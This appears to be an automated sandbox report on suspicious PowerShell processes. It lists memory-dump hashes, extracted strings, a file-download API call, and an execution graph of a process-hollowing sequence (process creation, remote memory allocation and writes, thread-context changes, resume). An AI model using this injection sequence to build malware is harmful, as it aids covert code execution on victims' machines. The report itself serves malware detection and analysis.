                                                                                                                          • Opcode ID: 4c295194a010c792fff5f9a4a71fbeac7e6fe46f8b8cbb1e7d3cfe0cb7ff76d2
                                                                                                                          • Instruction ID: 3c017edf9eaaa20ba7853c420eb368a3c6b7b7e3d9e73321a3a014c61ccb24c7
                                                                                                                          • Opcode Fuzzy Hash: 4c295194a010c792fff5f9a4a71fbeac7e6fe46f8b8cbb1e7d3cfe0cb7ff76d2
                                                                                                                          • Instruction Fuzzy Hash: 0BF1C7F0B002199BDB18DF69C454B7ABBF2EF86311F24805DE906AB352DB71DD428B91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1453383129.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 84Tj$84Tj$84Tj
                                                                                                                          • API String ID: 0-4275270300
                                                                                                                          • Opcode ID: 3fa900d988d6ad62f236630d709f0f44fa6e724f27bc6a54957329e94efccb8a
                                                                                                                          • Instruction ID: f769e5ba573788d1fdaf39e30c87c4a3a8457a09c4a7ff7e7ec22d96a6a313cf
                                                                                                                          • Opcode Fuzzy Hash: 3fa900d988d6ad62f236630d709f0f44fa6e724f27bc6a54957329e94efccb8a
                                                                                                                          • Instruction Fuzzy Hash: 109182F4A00219DBCB28DF58C454B79B7F2EB86311F25805DE906AB352DB71DD82CB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1453383129.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_76c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 84Tj$84Tj
                                                                                                                          • API String ID: 0-1570688683
                                                                                                                          • Opcode ID: 6843e03fb03b90185fbf6d18c898965ee33149fb9acfe18e947a2d733c332e60
                                                                                                                          • Instruction ID: c57d00586229ef9831930fa9cb906e835659a6d361a0ed03d1d6e3d803ea0f29
                                                                                                                          • Opcode Fuzzy Hash: 6843e03fb03b90185fbf6d18c898965ee33149fb9acfe18e947a2d733c332e60
                                                                                                                          • Instruction Fuzzy Hash: 08515AB27043149BDB20DB759C10B7ABBA2EF86721F54805EE646DF381DA71DC4287A1
                                                                                                                          APIs
                                                                                                                          • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 031751C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1442130310.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3170000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DownloadFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1407266417-0
                                                                                                                          • Opcode ID: 2f20170976f13d09cc51a240d7b6eeff4328d9b07cad3a03c218e1a48c2d9ae0
                                                                                                                          • Instruction ID: 7b2674aa4fc1eb4109108d14d5ea425a871a86ef8a95e1a41e0461c4fd4253e4
                                                                                                                          • Opcode Fuzzy Hash: 2f20170976f13d09cc51a240d7b6eeff4328d9b07cad3a03c218e1a48c2d9ae0
                                                                                                                          • Instruction Fuzzy Hash: 2A2104B1D01359AFCB14CF9AD984ADEFBF5FB48310F14812AE918A7210D374AA54CBA4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1441203974.0000000002E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E0D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_2e0d000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e06e252f075dcde587033f64094bf82f37bc2868bbc10e6fff336e2b1c1765fa
                                                                                                                          • Instruction ID: e6cda32dedd21d06afda74ca93ccd499dd36a86dd8325763618c8d8309569388
                                                                                                                          • Opcode Fuzzy Hash: e06e252f075dcde587033f64094bf82f37bc2868bbc10e6fff336e2b1c1765fa
                                                                                                                          • Instruction Fuzzy Hash: 2C01ED6144E3C05FD7128B258D94B56BFB4DF43228F19C1DBD9888F1A7C2695849C772
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1441203974.0000000002E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E0D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_2e0d000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 994c94c82e6a8f47b3d04375c2af23c9865205bcd48374ef5adcc86ae292a768
                                                                                                                          • Instruction ID: a223d3ac1287859f997ea5d70a04078956f7d3722eed97775c8e63f3d90c6471
                                                                                                                          • Opcode Fuzzy Hash: 994c94c82e6a8f47b3d04375c2af23c9865205bcd48374ef5adcc86ae292a768
                                                                                                                          • Instruction Fuzzy Hash: 9201D4714443409BE7208A51CDC0BA6BB98DF42328F18C41AED4D4A182C3799882CBB2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ;n^$;n^$;n^
                                                                                                                          • API String ID: 0-120871381
                                                                                                                          • Opcode ID: ee1d9c091d9ab136922df8ab7a28873f3dd7d2e9e8f03e3649e8046e9bbe9968
                                                                                                                          • Instruction ID: bdd5c7400304f1e47783b25fd7d63eb6c933e43324557d3d36be6a6e98840dcc
                                                                                                                          • Opcode Fuzzy Hash: ee1d9c091d9ab136922df8ab7a28873f3dd7d2e9e8f03e3649e8046e9bbe9968
                                                                                                                          • Instruction Fuzzy Hash: 5641B57060A3C58FC703CB68C89459ABFB0FF97254B1940DBD085DF2A3D675A806CB62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1331962829.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_79b0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 08642b1fff3ea455bb96263940b387ff2d04e74895a0288a607dddc9e9d95447
                                                                                                                          • Instruction ID: df54b305c58d2f31d41b6dc926ac7ef8261f1c910ed5bb42490c58b2b7df6f6a
                                                                                                                          • Opcode Fuzzy Hash: 08642b1fff3ea455bb96263940b387ff2d04e74895a0288a607dddc9e9d95447
                                                                                                                          • Instruction Fuzzy Hash: 871247B1B043198FCB358B6889207EABBF6EFC2219F1480BAD505CB251DF75D941C7A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: db719da347e00603e105253644a20cae346859b9346401e1a81b653d739e3807
                                                                                                                          • Instruction ID: 44d5f10cd5b5576510e04b23f51cb27604b24571635f5eb0c8ef8d2ab6425632
                                                                                                                          • Opcode Fuzzy Hash: db719da347e00603e105253644a20cae346859b9346401e1a81b653d739e3807
                                                                                                                          • Instruction Fuzzy Hash: BC91AC74A006058FCB15CF59C494AAEFBB1FF88320B248699D955AB365C736FC91CFA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1331962829.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_79b0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0ff22ba35b153ba064aa5fe2e77c0847684800ef97633fa97033946abc6c75ec
                                                                                                                          • Instruction ID: ba7a14c522b17e5c8d80dac08d0f92caf718de2fa7a76e47427343968dec44b3
                                                                                                                          • Opcode Fuzzy Hash: 0ff22ba35b153ba064aa5fe2e77c0847684800ef97633fa97033946abc6c75ec
                                                                                                                          • Instruction Fuzzy Hash: F641F3F0A8020ADFCB35CF598720BE97BFAAF85219F5480A6C9049F265CB35D941C7A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b2da531a87d98621aa9aac379ff836b03cbdee3e39bf7a80e593776538b98fa1
                                                                                                                          • Instruction ID: c2a1aa624a08b420fe9e03a891d2ce7b7fafedf6d27f32004570042c0ac53807
                                                                                                                          • Opcode Fuzzy Hash: b2da531a87d98621aa9aac379ff836b03cbdee3e39bf7a80e593776538b98fa1
                                                                                                                          • Instruction Fuzzy Hash: BF413A74A006059FCB09CF59C498AAAFBB1FF48324B219599D915AB365C732FC91CFA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9a99b2e8c49b82dd00143d06041383121225c0cb7f16aa0714cefd002489f181
                                                                                                                          • Instruction ID: e46438d78755c668e68644488be51f04b970e2cf4c6ba245f3986f63e54d879a
                                                                                                                          • Opcode Fuzzy Hash: 9a99b2e8c49b82dd00143d06041383121225c0cb7f16aa0714cefd002489f181
                                                                                                                          • Instruction Fuzzy Hash: 9D219D74A046498FDB01CFA8D890AEABBB1FF4A310B1585D6D449EB362D335ED45CBA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1325667136.0000000004CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CED000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_4ced000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1b712467321b786112b542ce2649117712cd7b07ae11ba1434851f703d7e2673
                                                                                                                          • Instruction ID: 100bb6ac930de9495aea8b8de11e9a68efaeb0b948e6d6879f6abc7c952de7d0
                                                                                                                          • Opcode Fuzzy Hash: 1b712467321b786112b542ce2649117712cd7b07ae11ba1434851f703d7e2673
                                                                                                                          • Instruction Fuzzy Hash: 7E015E7240E3C05FE7128B259D94B62BFB4DF43224F1D81DBD8888F1A3C2695849CB72
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1325667136.0000000004CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CED000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_4ced000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9d40521a767bf682a38cebf6fb481604b3d1c4c72950a0d2cbe09cc5263bd5f7
                                                                                                                          • Instruction ID: e5863f77b2eaab72982c2cef637045cfa96dbbc6b884a6959b42e6a1081d6068
                                                                                                                          • Opcode Fuzzy Hash: 9d40521a767bf682a38cebf6fb481604b3d1c4c72950a0d2cbe09cc5263bd5f7
                                                                                                                          • Instruction Fuzzy Hash: 2001F7715043419FE7204E13ED84B76BB98DF42224F1CC41AED4A0B142D779A581CAB1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1331962829.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_79b0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Lj$Lj$Lj$Lj
                                                                                                                          • API String ID: 0-3439345054
                                                                                                                          • Opcode ID: 012517d998f340356fe579aa30f1e2b14ff477294de1692867c48f9d9325df0c
                                                                                                                          • Instruction ID: 8d8c83d683a2b91996079b740a42044b7bdab75f32306cb1eb4cb7c3cb9503af
                                                                                                                          • Opcode Fuzzy Hash: 012517d998f340356fe579aa30f1e2b14ff477294de1692867c48f9d9325df0c
                                                                                                                          • Instruction Fuzzy Hash: FBF159B2B04219CFDB348B6895207EABBFAAFC6218F14807AD446CB351EB75DC45C791
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: p$p$p$p
                                                                                                                          • API String ID: 0-3467077657
                                                                                                                          • Opcode ID: af55fc4c279489af8e2197d6282dd8f0531c3e080be1e399e79243d9a186aa67
                                                                                                                          • Instruction ID: b6e17d7b8ed86faaf512ba979a7265412dd26d5d5cbaf91e3b2fb309f1f27e15
                                                                                                                          • Opcode Fuzzy Hash: af55fc4c279489af8e2197d6282dd8f0531c3e080be1e399e79243d9a186aa67
                                                                                                                          • Instruction Fuzzy Hash: F031F49281E3D0AFE7135738A8A82D53F614F53168B0A41D7C8E48F1A3E509694EC7B7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: p$p$p$p
                                                                                                                          • API String ID: 0-3467077657
                                                                                                                          • Opcode ID: 8ed84599169a13f409906cda79bf74b5eb2f8eb72ff8551b4a0b671ecf60ce23
                                                                                                                          • Instruction ID: ca5d1a892af00e595f88c0476dc5a2d618089383c8d828e3da0bcb6ea7e6a634
                                                                                                                          • Opcode Fuzzy Hash: 8ed84599169a13f409906cda79bf74b5eb2f8eb72ff8551b4a0b671ecf60ce23
                                                                                                                          • Instruction Fuzzy Hash: C62149A281E3D16FE3035B28A8752C57F609E53018F0A41EBC4D08F0A7E549984EC7B7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2177191713.00000000033FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_33fd000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ba6168b11344170d471dab0e428ee0b0415a1a3c55c769e1b3641ef31b3d3915
                                                                                                                          • Instruction ID: 4b80cd61fd7a2e038c6e1fa07d81766f8140482d1e485538868cce1cbd3d0eef
                                                                                                                          • Opcode Fuzzy Hash: ba6168b11344170d471dab0e428ee0b0415a1a3c55c769e1b3641ef31b3d3915
                                                                                                                          • Instruction Fuzzy Hash: BE01F7715043419FE720CE11CDC8B66FB9CEF42224F5CC46AEE490B54AC27D9445CAB2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2177191713.00000000033FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_33fd000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b5bb9f20dc3bd50076a7d845a8389f609ff9591bc2c77dac8e1892ceb83bd3a1
                                                                                                                          • Instruction ID: 61128bd7157c4f9cb1e2b10543408f388e7741dc2721b4fd1637aa4cfc4002fa
                                                                                                                          • Opcode Fuzzy Hash: b5bb9f20dc3bd50076a7d845a8389f609ff9591bc2c77dac8e1892ceb83bd3a1
                                                                                                                          • Instruction Fuzzy Hash: 00012D7240E3C09FD7128B258D94B52BFB4DF43224F1D80DBD9888F1A7C2695849CB72
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2178273009.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_3460000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1fe8ed05015cfb6cf1fde5f7768446802b7b94b2300742fbe765483a03b0c386
                                                                                                                          • Instruction ID: c9c65597f36eb03116de6fc6ec362d6085dbd31ea15c4e3b6c06ff78e55e9a7a
                                                                                                                          • Opcode Fuzzy Hash: 1fe8ed05015cfb6cf1fde5f7768446802b7b94b2300742fbe765483a03b0c386
                                                                                                                          • Instruction Fuzzy Hash: 13F0B235A001099FDB15CF99D890AEEF7B1FF88324F248159E555A72A1C732AC62CB61

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:6%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:41%
                                                                                                                          Total number of Nodes:61
                                                                                                                          Total number of Limit Nodes:5
                                                                                                                          execution_graph 10434 44c91cc 10436 44c91d4 10434->10436 10437 44c90f7 10436->10437 10438 44c9190 10437->10438 10441 44c941c 10437->10441 10439 44c9200 10442 44c964e 10441->10442 10443 44c9647 10441->10443 10442->10443 10444 44c9b27 10442->10444 10466 44c941c 8 API calls 10442->10466 10468 44c9b40 10442->10468 10443->10439 10456 44ca07b 10444->10456 10491 44c86f8 10444->10491 10446 44ca2fd CreateProcessW 10449 44ca371 10446->10449 10447 44c9c4c 10448 44c8704 Wow64SetThreadContext 10447->10448 10447->10456 10450 44c9caa 10448->10450 10452 44c9d99 VirtualAllocEx 10450->10452 10450->10456 10451 44ca091 10451->10439 10453 44c9de6 10452->10453 10454 44c9e11 VirtualAllocEx 10453->10454 10455 44c9e65 10453->10455 10454->10455 10455->10456 10457 44c871c WriteProcessMemory 10455->10457 10456->10446 10456->10451 10458 44c9ea2 10457->10458 10458->10456 10459 44c9fb0 10458->10459 10465 44c871c WriteProcessMemory 10458->10465 10459->10456 10460 44c871c WriteProcessMemory 10459->10460 10461 44c9fd9 10460->10461 10461->10456 10462 44c8728 Wow64SetThreadContext 10461->10462 10463 44ca037 10462->10463 10463->10456 10464 44ca03b ResumeThread 10463->10464 10464->10456 10465->10458 10466->10442 10469 44c9bb9 10468->10469 10470 44c86f8 CreateProcessW 10469->10470 10471 44ca07b 10469->10471 10474 44c9c4c 10470->10474 10472 44ca2fd CreateProcessW 10471->10472 10476 44ca091 10471->10476 10473 44ca371 10472->10473 10474->10471 10495 44c8704 10474->10495 10476->10442 10477 44c9caa 10477->10471 10478 44c9d99 VirtualAllocEx 10477->10478 10479 44c9de6 10478->10479 10480 44c9e11 VirtualAllocEx 10479->10480 10481 44c9e65 10479->10481 10480->10481 10481->10471 10499 44c871c 10481->10499 10483 44c9fb0 10483->10471 10484 44c871c WriteProcessMemory 10483->10484 10486 44c9fd9 10484->10486 10485 44c9ea2 10485->10471 10485->10483 10490 44c871c WriteProcessMemory 10485->10490 10486->10471 10503 44c8728 10486->10503 10489 44ca03b ResumeThread 10489->10471 10490->10485 10492 44ca218 CreateProcessW 10491->10492 10494 44ca371 10492->10494 10496 44ca458 Wow64SetThreadContext 10495->10496 10498 44ca4d2 10496->10498 10498->10477 10501 44ca8e8 WriteProcessMemory 10499->10501 10502 44ca973 10501->10502 10502->10485 10504 44ca458 Wow64SetThreadContext 10503->10504 10506 44ca037 10504->10506 10506->10471 10506->10489
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: lX
                                                                                                                          • API String ID: 0-2093460002
                                                                                                                          • Opcode ID: e1a2f6fb952eb1d499d0ce94f8ec85c8ebe30dbcbee87aaf0159aa7efa110517
                                                                                                                          • Instruction ID: 92e16850d6fb827c80d6347ec54d133dc0a1d05d485a0270d25cc1f3869b50cc
                                                                                                                          • Opcode Fuzzy Hash: e1a2f6fb952eb1d499d0ce94f8ec85c8ebe30dbcbee87aaf0159aa7efa110517
                                                                                                                          • Instruction Fuzzy Hash: DA52B275A002189FDF64DF79D8547AEBBB2BF84300F1881AED449A7391DB34AD42CB91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 699 44c2c80-44c2ca3 701 44c2cc4 699->701 702 44c2ca5-44c2cae 699->702 705 44c2cc7-44c2cf8 701->705 703 44c2cb5-44c2cb8 702->703 704 44c2cb0-44c2cb3 702->704 706 44c2cc2 703->706 704->706 708 44c2d6c-44c2d96 705->708 709 44c2cfa-44c2d03 705->709 706->705 714 44c2d9c-44c2da5 708->714 715 44c2e51-44c2ece 708->715 709->708 710 44c2d05-44c2d0b 709->710 712 44c2f54-44c2f62 710->712 713 44c2d11-44c2d1e 710->713 720 44c2f6b-44c2f71 712->720 721 44c2f64-44c2f6a 712->721 716 44c2d20-44c2d44 713->716 717 44c2d63-44c2d6a 713->717 714->712 719 44c2dab-44c2dda 714->719 787 44c2ee8-44c2efb 715->787 788 44c2ed0-44c2ee6 715->788 730 44c2d5f 716->730 731 44c2d46-44c2d49 716->731 717->708 717->710 736 44c2ddc-44c2df2 719->736 737 44c2df4-44c2e07 719->737 724 44c2f73-44c2fa2 720->724 721->720 721->724 727 44c2fe8 724->727 728 44c2fa4-44c2fab 724->728 732 44c2feb-44c3027 727->732 733 44c2fbc 728->733 734 44c2fad-44c2fba 728->734 730->717 739 44c2d4b-44c2d4e 731->739 740 44c2d55-44c2d5e 731->740 750 44c3029-44c3032 732->750 751 44c30a4-44c30af 732->751 741 44c2fbe-44c2fc0 733->741 734->741 742 44c2e09-44c2e10 736->742 737->742 739->740 746 44c2fc7-44c2fc9 741->746 747 44c2fc2-44c2fc5 741->747 748 44c2e35 742->748 749 44c2e12-44c2e23 742->749 753 44c2fda 746->753 754 44c2fcb-44c2fd8 746->754 752 44c2fe6 747->752 748->715 749->748 765 44c2e25-44c2e2e 749->765 750->751 759 44c3034-44c303a 750->759 757 44c30be-44c30e0 751->757 758 44c30b1-44c30b4 751->758 752->732 756 44c2fdc-44c2fde 753->756 754->756 756->752 770 44c30e6-44c30ef 757->770 771 44c31a2-44c31f0 757->771 758->757 762 44c32da-44c3322 759->762 763 44c3040-44c304d 759->763 773 44c3368 762->773 774 44c3324-44c332b 762->774 767 44c304f-44c307a 763->767 768 44c309b-44c30a2 763->768 765->748 785 44c307c-44c307f 767->785 786 44c3097 767->786 768->751 768->759 770->762 775 44c30f5-44c312b 770->775 833 44c31f3-44c3229 771->833 777 44c336b-44c33a7 773->777 778 44c333c 774->778 779 44c332d-44c333a 774->779 809 44c312d-44c3143 775->809 810 44c3145-44c3158 775->810 799 44c33a9-44c33b2 777->799 800 44c3422-44c342d 777->800 784 44c333e-44c3340 778->784 779->784 792 44c3347-44c3349 784->792 793 44c3342-44c3345 784->793 796 44c308b-44c3094 785->796 797 44c3081-44c3084 785->797 786->768 798 44c2efd-44c2f04 787->798 788->798 794 44c335a 792->794 795 44c334b-44c3358 792->795 802 44c3366 793->802 803 44c335c-44c335e 794->803 795->803 797->796 807 44c2f06-44c2f0c 798->807 808 44c2f13 798->808 799->800 806 44c33b4-44c33ba 799->806 804 44c343c-44c345e 800->804 805 44c342f-44c3432 800->805 802->777 803->802 823 44c351e-44c355b 804->823 824 44c3464-44c346d 804->824 805->804 814 44c33c0-44c33cd 806->814 815 44c3643-44c3658 806->815 807->808 808->712 812 44c315a-44c3161 809->812 810->812 816 44c3186-44c319c 812->816 817 44c3163-44c3174 812->817 820 44c33cf-44c33f8 814->820 821 44c3419-44c3420 814->821 829 44c35ed-44c35f1 815->829 830 44c365a-44c366f 815->830 816->770 816->771 817->816 832 44c3176-44c317f 817->832 840 44c33fa-44c33fd 820->840 841 44c3415 820->841 821->800 821->806 856 44c355e-44c35bb 823->856 824->815 828 44c3473-44c34a7 824->828 851 44c34a9-44c34bf 828->851 852 44c34c1-44c34d4 828->852 835 44c3600-44c360a 829->835 836 44c35f3-44c35f9 829->836 844 44c3671-44c36d8 830->844 832->816 865 44c3231-44c3244 833->865 835->856 836->835 846 44c33ff-44c3402 840->846 847 44c3409-44c3412 840->847 841->821 862 44c36da-44c371e 844->862 846->847 855 44c34d6-44c34dd 851->855 852->855 859 44c34df-44c34f0 855->859 860 44c3502-44c3518 855->860 881 44c35bd-44c35d3 856->881 882 44c35d5-44c35e8 856->882 859->860 869 44c34f2-44c34fb 859->869 860->823 860->824 885 44c3247 call 7230b11 865->885 886 44c3247 call 7230b38 865->886 869->860 870 44c3249-44c3252 873 44c326c-44c327f 870->873 874 44c3254-44c326a 870->874 875 44c3281-44c3288 873->875 874->875 876 44c328a-44c3290 875->876 877 44c3297-44c32a1 875->877 876->877 877->833 884 44c35ea 881->884 882->884 884->829 885->870 886->870
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2d2eac2d1c206e0cb8e09aeca619d36655d243aa11198c09394da83967d8cc32
                                                                                                                          • Instruction ID: 68f918cc1b93e0f6d2f49f3193de25be79424a93bcf8279f29afce68f1285e2f
                                                                                                                          • Opcode Fuzzy Hash: 2d2eac2d1c206e0cb8e09aeca619d36655d243aa11198c09394da83967d8cc32
                                                                                                                          • Instruction Fuzzy Hash: A562F974A01218EFDB55CF98D484A9DBBF2BF49314F28C15AE805AB351D7B1ED82CB90

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
